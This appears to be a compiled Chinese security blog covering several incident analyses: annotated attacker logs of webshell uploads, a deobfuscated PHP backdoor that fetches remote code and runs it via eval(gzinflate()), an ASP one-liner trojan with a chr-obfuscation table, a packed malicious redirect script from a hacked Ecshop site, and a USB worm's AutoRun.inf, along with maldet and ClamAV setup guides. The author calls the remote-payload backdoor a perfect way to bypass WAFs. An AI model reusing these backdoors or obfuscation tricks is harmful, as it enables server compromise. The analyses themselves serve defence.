//攻击者成功上传了demo.php 后门webshell了,之前开始上传的时候没有指定上传目录,这里上传到指定目录了,可见上传功能参数应该包括上传路径和文件名;

138.128.212.179 – – [16/Jul/2016:00:14:31 +0800] “GET /Public/Uploadify/demo.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:31 +0800] “GET /favicon.ico HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:43 +0800] “GET /Public/Ueditor/php/upload.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:44 +0800] “GET /Public/Ueditor/php/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:46 +0800] “GET /Public/Ueditor/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:47 +0800] “GET /Public/ HTTP/1.1” 403 273 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//中间攻击者用后门不晓得做过那些事情,这里还请求过/Public/Ueditor/php/upload.php文件,是404状态,不晓得是客户删除了,还是有防护软件攻击者没上传成功呢。

138.128.212.179 – – [16/Jul/2016:00:15:28 +0800] “GET /Home/Login/loginadmin/account/819432780@qq.com/password/e61d6ad4e829e87c9c3791d161f8522c HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//看到一条这个记录,说明他是用这个账户登陆的,应该在后台直接把攻击者账户删掉,封禁IP,也可以加攻击者QQ聊聊。

138.128.212.179 – – [16/Jul/2016:00:16:04 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 59 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//上面黑客的webshell被删掉了,又要来上传了

138.128.212.179 – – [16/Jul/2016:00:16:33 +0800] “POST /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1” 200 32 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//webshell上传成功了

138.128.212.179 – – [16/Jul/2016:00:16:43 +0800] “GET /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//黑客开始访问了,貌似出现问题了? 不能正常访问?

138.128.212.179 – – [16/Jul/2016:00:17:02 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 60 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:17:11 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [16/Jul/2016:00:17:21 +0800] “GET /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//又上传了一个vbak文件,可能是被杀掉了,返回405状态码,想绕过防护吧。

138.128.212.179 – – [16/Jul/2016:00:17:46 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 57 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:17:52 +0800] “GET /Uploads/Pic/2016-07-16/57890caaf344c.1 HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//又改了个后缀名

138.128.212.179 – – [16/Jul/2016:00:18:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 404 1331 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//访问demo.php 页面不存在

138.128.212.179 – – [16/Jul/2016:00:18:53 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [16/Jul/2016:00:18:58 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//访问上传的webshell,返回405状态

138.128.212.179 – – [16/Jul/2016:00:23:29 +0800] “GET /Public/kindeditor/php/upload.php HTTP/1.1” 200 0 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//又被黑客找到一个上传点

138.128.212.179 – – [16/Jul/2016:00:23:51 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 144 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:23:52 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 290 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:23:53 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 1526 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:24:01 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 6514 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

//尝试上传了数次,还是没有绕过去。

138.128.212.179 – – [19/Jul/2016:16:21:46 +0800] “GET /Uploads/146891188257179.jpg HTTP/1.1” 200 150958 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:21:55 +0800] “GET /Uploads/146890768218257.png HTTP/1.1” 200 78289 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:01 +0800] “GET /Uploads/146890724044584.png HTTP/1.1” 200 87084 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:10 +0800] “GET /Uploads/146890703177801.jpg HTTP/1.1” 200 44256 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:16 +0800] “GET /Uploads/146890694154072.png HTTP/1.1” 200 81028 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:22 +0800] “GET /Uploads/146890667880773.png HTTP/1.1” 200 69520 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:30 +0800] “GET /Uploads/146890663744137.png HTTP/1.1” 200 100128 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:37 +0800] “GET /Uploads/146890655699351.png HTTP/1.1” 200 135056 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:44 +0800] “GET /Uploads/146890646027724.png HTTP/1.1” 200 103372 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:50 +0800] “GET /Uploads/146890637216135.png HTTP/1.1” 200 108561 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:22:55 +0800] “GET /Uploads/146890628924480.png HTTP/1.1” 200 104940 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:00 +0800] “GET /Uploads/146890463858741.png HTTP/1.1” 200 82636 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:06 +0800] “GET /Uploads/146890438128119.jpg HTTP/1.1” 200 182931 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:16 +0800] “GET /Uploads/146890436882884.jpg HTTP/1.1” 200 182931 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:32 +0800] “GET /Uploads/146890420781045.png HTTP/1.1” 200 126604 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:43 +0800] “GET /Uploads/146890419983679.jpg HTTP/1.1” 200 51284 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:23:53 +0800] “GET /Uploads/146890362678175.png HTTP/1.1” 200 85621 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:24:00 +0800] “GET /Uploads/146890345652557.png HTTP/1.1” 200 83409 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:24:35 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 186 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

//上面黑客上传的图片,如果图片中包括恶意代码也执行不了,除非借助解析漏洞;
//最后黑客又扫了扫,然后就没有日志了,到此反渗透日志分析到此结束咯。

一个PHP后门的分析过程

<?php
$password='123';
//----------功能程序------------------//
$c="chr";//字符串
session_start();

if(empty($_SESSION['PhpCode'])){
$url.=$c(104).$c(116).$c(116).$c(112).$c(58);
$url.=$c(47).$c(47).$c(104).$c(106).$c(105);
$url.=$c(117).$c(46).$c(108).$c(97).$c(47);
$url.=$c(115).$c(99).$c(120).$c(112).$c(46);
$url.=$c(103).$c(105).$c(102);

//$url = chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(104)chr(106)chr(105)chr(117)chr(46)chr(108)chr(97)chr(47)chr(115)chr(99)chr(120)chr(112)chr(46)chr(103)chr(105)chr(102)

//$url = http://hjiu.la/scxp.gif

$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);

//$get = chr(102)chr(105)chr(108)chr(101)chr(95)chr(103)chr(101)chr(116)chr(95)chr(99)chr(111)chr(110)chr(116)chr(101)chr(110)chr(116)chr(115)

//$get = file_get_contents

echo  $get($url);

$_SESSION['PhpCode']=$get($url);
}

//echo $url;

$unzip=$c(103).$c(122).$c(105).$c(110);
$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
//echo $unzip;//die;

//chr(103).chr(122).chr(105).chr(110)chr(102).chr(108).chr(97).chr(116).chr(101)

//$unzip = gzinflate 解码处理
@eval($unzip($_SESSION['PhpCode']));

?>

今晚帮客户分析一个后门程序,分析过程如上,试了下过不了狗,eval直接写肯定就过不了狗,估计改改可以绕过安全狗,真是一个完美的思路,调用远程加密的后门代码绕过WAF。

Linux下maldet查恶意软件

安装maldet
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xvf maldetect-current.tar.gz
cd maldetect-1.5/
./install.sh
配置文件:/usr/local/maldetect/conf.maldet
maldet –scan-all / #扫描所有目录
maldet –report 021015-1051.3559 #查看输出报告
linux公社:http://www.linuxidc.com/Linux/2015-03/115620.htm

Centos安装 Clam AntiVirus 杀毒软件

cd /etc/yum.repos.d/ #进入yum源配置文件夹

vi dag.repo #创建yum源文件
[dag]
name=Dag RPM Repository for RHEL4
baseurl=http://ftp.riken.jp/Linux/dag/redhat/el4/en/$basearch/dag/
enabled=1
gpgcheck=0

yum -y install clamd #安装clamd

上面安装方式有时会遇到一些问题,还有另一种安装办法,是把上面的yum给分开安装了,如下:
去http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/找到合适的版本下载安装包,需要下载3个,规则为2个clamav开头的,一个是_db,一个不是的。另外一个clamd的,三个要找同一版本下载。
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamav-db-0.98.1-1.el4.rf.x86_64.rpm
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamav-0.98.1-1.el4.rf.x86_64.rpm
wget http://ftp.riken.jp/Linux/dag/redhat/el4/en/x86_64/dag/RPMS/clamd-0.98.1-1.el4.rf.x86_64.rpm
下载好了后,一个一个的安装。
rpm -ivh clamav-db-0.98.1-1.el4.rf.x86_64.rpm
rpm -ivh clamav-0.98.1-1.el4.rf.x86_64.rpm
rpm -ivh clamd-0.98.1-1.el4.rf.x86_64.rpm

还有另一个源的安装方式如下:
[dag]
name=Dag RPM Repository for Red Hat Enterprise Linux
baseurl=http://apt.sw.be/redhat/el$releasever/en/$basearch/dag
enabled=1
gpgcheck=0

yum -y install clamav* && yum -y install clamd*
在不同centos下会遇到不同的问题,汇总了以上几种安装方式,还有一种说需要安装ntp,不过没安装也没遇到问题。( yum -y install ntp)
常用命令:
启动: service clamav ?start
更新病毒库:freshclam , freshclam –daemon (保持守护进程 &)
扫描指定目录:clamscan -r /root/? #clamscan 默认查杀当前目录
扫描指定文件:clamscan /root/clamav.zip
扫描并删除带有病毒的文件: clamscan -r -–remove /usr/ #系统文件中毒,可能删除系统文件影响系统使用
将扫描结果保存: clamscan -r / -l /root/hack.log
freshclam开机启动:echo “/usr/bin/freshclam –daemon” >> /etc/rc.d/rc.local
参数:–no-summary #只显示被感染的文件。

php变形一句话木马和加密原理

php比较流行的一句话木马很多,甚至老外研究的,一般人都看不懂,今天看到某站中了chr一句话木马,一看就不正常具体就不发代码了,总结下asp,php的chr类型变形一句话木马和加密。
<%eval request(chr(65))%>
这句话用菜刀链接密码就是A,菜刀就是post请求A参数提交任意代码。用burpsuite可以看到菜刀的所有操作,自己也可以把菜刀的代码down下来,自己写一个去。不过没啥意义,还不如直接反编译为自己了,可以装装感觉很厉害的样子。chr里面的数字就是对应的ASCII码,附一份ASCII码表,也可以自己写个工具,翻译出来。

chr(9) tab空格
chr(10) 换行
chr(13) 回车
chr(13)&chr(10) 回车换行
chr(32) 空格符
chr(34) 双引号
chr(39) 单引号
chr(33) !
chr(34) ”
chr(35) #
chr(36) $
chr(37) %
chr(38) &
chr(39) ‘
chr(40) (
chr(41) )
chr(42) *
chr(43) +
chr(44) ,
chr(45) –
chr(46) .
chr(47) /
chr(48) 0
chr(49) 1
chr(50) 2
chr(51) 3
chr(52) 4
chr(53) 5
chr(54) 6
chr(55) 7
chr(56) 8
chr(57) 9
chr(58)
chr(59) ;
chr(60) <
chr(61) =
chr(62) >
chr(63) ?
chr(64) @
chr(65) A
chr(66) B
chr(67) c
chr(68) D
chr(69) E
chr(70) F
chr(71) G
chr(72) H
chr(73) I
chr(74) J
chr(75) K
chr(76) L
chr(77) M
chr(78) N
chr(79) O
chr(80) P
chr(81) Q
chr(82) R
chr(83) S
chr(84) T
chr(85) U
chr(86) V
chr(87) W
chr(88) X
chr(89) Y
chr(90) Z
chr(91) [
chr(92) \
chr(93) ]
chr(94) ^
chr(95) _
chr(96) `
chr(97) a
chr(98) b
chr(99) c
chr(100) d
chr(101) e
chr(102) f
chr(103) g
chr(104) h
chr(105) i
chr(106) j
chr(107) k
chr(108) l
chr(109) m
chr(110) n
chr(111) o
chr(112) p
chr(113) q
chr(114) r
chr(115) s
chr(116) t
chr(117) u
chr(118) v
chr(119) w
chr(120) x
chr(121) y
chr(122) z
chr(123) {
chr(124) |
chr(125) }
还有比这个复杂的密码对应ASCII码表可翻译出来。

然后好多一句话木马看起来不是这样,是用base64做了加密处理,然后在文件中解密,这种加密方式翻转一下就ok。

一个WEB挂马的分析思路

又一次遇到搜索引擎欺骗类型的挂马了,这类挂马很高级,甚至不好判断是篡改的后台代码还是前端代码,而使用代理截断数据包去分析会发现不了搜索引擎跳转。从代码中搜索,查找都找不到,肯定是做过加密处理了,是比较难找,这次是Ecshop的一个挂马处理,汇总了一下思路。
首先通过百度搜索命令site:域名,发现通过百度进入的都会跳转,而直接进入网址的都不会跳转。开始觉得肯定是后台做判断了,但是找了找没找到代码,中间也有怀疑前端js的可能性,不过源码这么大,从头找的话无从下手,然后从goods.php下手了。打开goods.php文件,在require(dirname(__FILE__) . ‘/includes/init.php’);后面下断点 die(‘——exit—–‘);通过搜索引擎去打开,发现依旧存在挂马。说明问题在/includes/init.php这个文件中,然后又打开这个文件,也是从上到下循环下断点,在这个文件中发现在第83行中require(ROOT_PATH . ‘includes/lib_goods.php’); 在这里之前下断点就会终止程序,而在这里之后依然存在挂马,说明是引入的这个文件有问题。继续找这个文件。功夫不负有心人,在第996行有段代码被发现了,@print_r($web1);通过打印web1这个变量输出了一个js,通过这个js控制的页面跳转,而且这个js会判断来路去跳转到不同的挂马网站。把代码提取出来如下:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('D n$=["\\E\\t\\E\\U\\U\\I\\t\\t","\\K\\x\\W\\x\\1s\\x\\W\\x\\P\\x\\W\\x\\1o","\\1n\\x\\W\\x\\U\\x\\W\\x\\1t\\x\\W\\x\\1t","\\M\\u\\t\\r\\q\\C\\o\\w\\B\\s\\v\\G\\R\\s\\G\\p\\z\\"\\N\\s\\O\\s\\u\\t\\r\\q\\C\\o\\"\\w\\o\\Q\\C\\p\\z\\"\\o\\p\\1v\\o\\/\\N\\s\\O\\s\\u\\t\\r\\q\\C\\o\\"\\w\\u\\r\\t\\z\\"\\F\\o\\o\\C\\1e\\J\\J\\N\\u\\I\\R\\u\\p\\r\\u\\I\\X\\K\\I\\B\\s\\J\\K\\U\\K\\1s\\X\\1N\\K\\U\\I\\N\\u\\"\\L\\M\\/\\u\\t\\r\\q\\C\\o\\L\\M\\u\\t\\r\\q\\C\\o\\w\\B\\s\\v\\G\\R\\s\\G\\p\\z\\"\\N\\s\\O\\s\\u\\t\\r\\q\\C\\o\\"\\w\\o\\Q\\C\\p\\z\\"\\o\\p\\1v\\o\\/\\N\\s\\O\\s\\u\\t\\r\\q\\C\\o\\"\\w\\u\\r\\t\\z\\"\\F\\o\\o\\C\\1e\\J\\J\\N\\u\\I\\R\\u\\p\\r\\u\\I\\X\\K\\I\\B\\s\\J\\K\\U\\X\\U\\P\\X\\1o\\P\\I\\N\\u\\"\\L\\M\\/\\u\\t\\r\\q\\C\\o\\L",\'\\M\',\'\\t\\p\',\'\\v\',\'\\o\',\'\\p\',\'\\r\\L\\M\\q\',\'\\1b\',\'\\r\',\'\\s\',\'\\E\',\'\\p\\w\\w\\u\',\'\\t\',\'\\r\',\'\\H\',\'\\B\',\'\\B\',\'\\q\',\'\\v\',\'\\G\',\'\\z\',\'\\A\\v\',\'\\H\\A\\w\\E\',\'\\s\',\'\\r\',\'\\G\',\'\\q\',\'\\v\',\'\\F\',\'\\p\',\'\\q\',\'\\G\',\'\\F\',\'\\o\',\'\\z\\P\\w\\E\',\'\\s\',\'\\r\',\'\\G\',\'\\q\',\'\\v\',\'\\Z\',\'\\q\',\'\\y\',\'\\o\',\'\\F\',\'\\z\\P\\w\\w\\1b\',\'\\r\',\'\\s\',\'\\E\',\'\\p\',\'\\1y\',\'\\H\',\'\\r\',\'\\y\',\'\\p\',\'\\r\',\'\\z\\A\\P\\A\\w\\Z\',\'\\q\',\'\\y\',\'\\o\',\'\\F\',\'\\z\\A\\K\',\'\\P\',\'\\P\',\'\\1J\\A\\w\\Z\',\'\\q\',\'\\y\',\'\\o\',\'\\F\',\'\\z\\A\',\'\\A\\w\\F\',\'\\p\',\'\\q\',\'\\G\',\'\\F\',\'\\o\',\'\\z\\A\',\'\\A\\w\\u\',\'\\r\',\'\\t\',\'\\z\\A\',\'\\F\',\'\\o\',\'\\o\',\'\\C\',\'\\1e\',\'\\J\',\'\\J\',\'\',\'\\A\\L\\M\\J\',\'\\q\',\'\\1b\',\'\\r\',\'\\s\',\'\\E\',\'\\p\',\'\\L\',\'\\M\',\'\\J\',\'\\t\',\'\\p\',\'\\v\',\'\\o\',\'\\p\',\'\\r\',\'\\L\',\'\\M\',\'\\y\',\'\\q\',\'\\O\',\'\\w\\q\',\'\\y\',\'\\z\\A\\q\',\'\\1f\',\'\\1z\\H\',\'\\y\',\'\\Q\',\'\\1n\\A\\L\',\'\',\'\',\'\',\'\',\'\',\'\',"\\y\\H","\\t\\R","\\E\\p\\v\\o\\I\\Z\\r","\\q\\o\\p\\1k\\x","\\x\\1i\\1p","\\y\\H","\\t\\R","\\E\\p\\v\\o\\I\\Z\\r","\\q\\o\\p\\1k\\x","\\x\\1i\\1p","\\E\\Q\\1h\\v\\o\\p\\r\\O\\s\\B\\1k\\1i","\\y\\H\\t\\R\\E\\p\\v\\o","\\G\\p\\o\\1I\\B\\p\\E\\p\\v\\o\\1z\\Q\\1h\\y","\\y\\q\\O","\\1L\\B\\B","\\u\\o\\Q\\B\\p","\\y\\q\\u\\C\\B\\s\\Q","\\v\\H","\\v\\p","\\1y\\H\\y\\Q","\\t\\F\\q\\B\\y\\r\\p\\v","\\B\\p\\v\\G\\o\\F","\\o\\s\\G\\1M\\s\\E\\p","\\q\\y","\\1f\\1h\\1K","\\q\\t\\H\\v\\1f\\q\\O\\K","\\v\\H\\v","\\p"];D a=n$[0];D b=n$[1];D c=n$[2];D d=n$[3];D f=n$[4]+n$[5]+n$[6]+n$[7]+n$[8]+n$[9]+n$[10]+n$[11]+n$[12]+n$[13]+n$[14]+n$[15]+n$[11]+n$[17]+n$[18]+n$[18]+n$[20]+n$[6]+n$[22]+n$[23]+n$[24]+n$[25]+n$[12]+n$[11]+n$[22]+n$[20]+n$[6]+n$[V]+n$[8]+n$[20]+n$[22]+n$[V]+n$[7]+n$[1E]+n$[12]+n$[11]+n$[22]+n$[20]+n$[6]+n$[1D]+n$[20]+n$[S]+n$[7]+n$[V]+n$[1H]+n$[11]+n$[12]+n$[13]+n$[8]+n$[1G]+n$[17]+n$[11]+n$[S]+n$[8]+n$[11]+n$[1F]+n$[20]+n$[S]+n$[7]+n$[V]+n$[2p]+n$[1l]+n$[1l]+n$[2l]+n$[20]+n$[S]+n$[7]+n$[V]+n$[1g];D g=n$[2n]+n$[8]+n$[20]+n$[22]+n$[V]+n$[7]+n$[1g];D h=n$[2m]+n$[11]+n$[15]+n$[1g]+n$[V]+n$[7]+n$[7]+n$[2q]+n$[2o]+n$[1j]+n$[1j]+n$[T];D i=n$[2k]+n$[20]+n$[10]+n$[11]+n$[12]+n$[13]+n$[8]+n$[1m]+n$[4]+n$[1j]+n$[15]+n$[8]+n$[6]+n$[7]+n$[8]+n$[11]+n$[1m]+n$[4]+n$[S]+n$[20]+n$[1X]+n$[1W]+n$[S]+n$[1V]+n$[21]+n$[1Z]+n$[S]+n$[1Y]+n$[1U];D j=f+n$[T]+b+n$[T]+g+n$[T]+c+n$[T]+h+n$[T]+a+n$[T]+i;1A(n$[1x]+n$[1C]+n$[1B]+n$[1q]+j+n$[1r]);1A(n$[1x]+n$[1C]+n$[1B]+n$[1q]+d+n$[1r]);1c{1Q(n$[1P],1O)}1d(e){}1T 1S(){1c{Y[n$[16]][n$[1R]](n$[26]+n$[2g])[n$[1w]][n$[1u]]=n$[2f]+n$[2e]}1d(e){}2j(D k=2i;k<Y[n$[16]][n$[1a]][n$[19]][n$[2h]];k++){1c{D l=Y[n$[16]][n$[1a]][n$[19]][k][n$[2d]];D m=Y[n$[16]][n$[1a]][n$[19]][k][n$[29]];28(l==n$[27]&&m!=n$[2c]){Y[n$[16]][n$[1a]][n$[19]][k][n$[1w]][n$[1u]]=n$[2b]+n$[2a]}}1d(e){}}}',62,151,'|||||||||||||||||||||||_|x74|x65|x69|x72|x61|x63|x73|x6e|x20|x27|x64|x3d|x22|x6c|x70|var|x6d|x68|x67|x6f|x2e|x2f|x31|x3e|x3c|x6a|x76|x30|x79|x75|45|91|x38|31|x2b|x35|window|x77|||||||138|||147|146|x66|try|catch|x3a|x44|72|x49|x29|89|x28|65|99|x32|x34|x3b|130|131|x39|x33|143|x78|142|127|x62|x42|eval|129|128|43|37|59|53|48|x45|x25|x56|x41|x4e|x37|0xbb8|137|setInterval|139|myInterval|function|120|115|113|112|119|117||116|||||140|151|if|150|154|153|152|149|145|144|141|148|0x0|for|92|67|80|73|88|64|87'.split('|'),0,{})

通过分析这个站被挂马是后台和前端,加密一起挂马的。

基于WIN系列一个很难查找到的挂马thumbs.db

今天浏览自己的演示系统,奇怪,被挂黑链了,iframe框架链接的一个exe可执行文件,而且时而有,时而没有,有的时候用谷歌浏览器会自动下载并运行。试了服务器的好几个站点都存在这种问题,甚至只有html页面的站也存在这问题。奇怪了,难道apache环境被挂马了?找了下apache,没有第三方模块加载,找了许久也没找到问题。
一个疑点有了思路,看到站点虚拟目录的最新创建时间都是当天,而这几个站点今天不可能同时都在更新,难道所有站点都被挂马了?觉得不太可能,或者服务器被提权了?为何只挂web页面呢。用一份备份的程序替换了,打开网站依旧时而有挂马,时而没有挂马。最新下载一份Thinkphp框架,生成一个项目,依旧有挂马,不可能Thinkphp官网的程序被挂马。然后把虚拟站点文件夹隐藏属性取消了,显示隐藏文件,发现每个站点下都有一个thumbs.db 文件,理论上thumbs.db是缩略图缓冲文件,以为不会出现什么问题,实在找不到其他问题了,于是删掉这个文件后访问站点,果然挂马不在了。确定是thumbs.db文件的问题了。
百度查了下对于thumbs.db的说法有很多。百度讲:http://baike.baidu.com/link?url=9p0lOi4y1lqhluQNaR54KBhiWJhEUDMEcMXvkXkjm6X2FhJXDDL3gU38a04RxCJJNEtwyk_gKdlTGsO0q5WF8K?互动百度讲:http://www.baike.com/wiki/%E7%BC%A9%E7%95%A5%E5%9B%BE%E6%BC%8F%E6%B4%9E?可见此漏洞的危害性极大。是一个WINDOWS图形接口远程执行漏洞,尝试了把这个文件复制出,用360和小红伞等各种web安全软件和服务器软件,都是查不到任何信息。修复服务器漏洞看来真的是非常重要。
之前出现过一次问题,由于忽略了,并未细致检查原因,导致这次多个站点被挂马。解决方案需要配置下文件夹属性,不允许缩略图缓存就好了。同时微软出了漏洞补丁,也打下补丁。回头有时间研究研究这个高级的服务器漏洞。很奇葩的漏洞,中招后,实在难找出问题所在。
补充:微软官网补丁说明有可能提权,如果单纯是这一个文件提不了权,需要通过这个文件进一步交互才可以提权。如服务器已经被挂马,掺改,可以用以下批处理批量删掉并且设置文件夹属性中的缩略图缓存功能打勾。del /S *.db

手工查杀一个蠕虫病毒

昨天上网聊天,正在聊得好的时候,去软件盘里面找软件,怎么都变成快捷方式了,都不显示了,我没开杀软,这一定是病毒在搞的鬼了,把快捷方式删除掉,软件盘里面什么都没有了,删除的都是快捷方式,没事,文件肯定还藏在磁盘里面,用了下DOS命令,ATTRIB,没效果,还是不显示,于是我进PE看了下,看到里面的文件了,看到了每个磁盘里面都有两个文件,一个是AutoRun.inf,另一个是1066705994.vbs,第一个AutoRun.inf这个配置文件,是干嘛的呢,之前写了一篇文章里面写的修改U盘图标,就是用的这个文件夹,就是自动加载的意思,只要单击一下,就会触发他,先说下我之前因为看不到文件的原因吧,之前看不到文件的原因,那是因为这两个文件是受保护的系统文件属性,所以,在文件夹选项选择,显示所有文件夹(包括隐藏文件夹),然后显示系统文件夹也不显示,还有一个,就是隐藏操作系统受保护的文件,这里把对号去掉就可以看到我们的文件夹而不是快捷方式了。。。
看下AutoRun.inf里面的内容:
[AutoRun]
Shellexecute=WScript.exe 1066705994.vbs “AutoRun”
shell\open=HH(&O)
shell\open\command=WScript.exe 1066705994.vbs “AutoRun”
shell\open\Default=1
shell\explore=HHHHH(&X)
shell\explore\command=WScript.exe 1066705994.vbs “AutoRun”
这配置文件里面的意思就是自动加载 1066705994.vbs 这个脚本。。。 下面看下脚本的内容:
‘b”3X&&#&3ex’)!x3ax,(jr
‘_%);a/+Gr/$n$!((Un!0;a/+X^.!|0!j}&!~0C=/~m%ko%*bI”%g`/5/o!h+]&`~o=DUn!0;r/$n$!((X^.!|0!j}&!~0C=3n~m%,oInc!(g=DU^|((;h|%*CDkp
‘5WDa/CKPijon
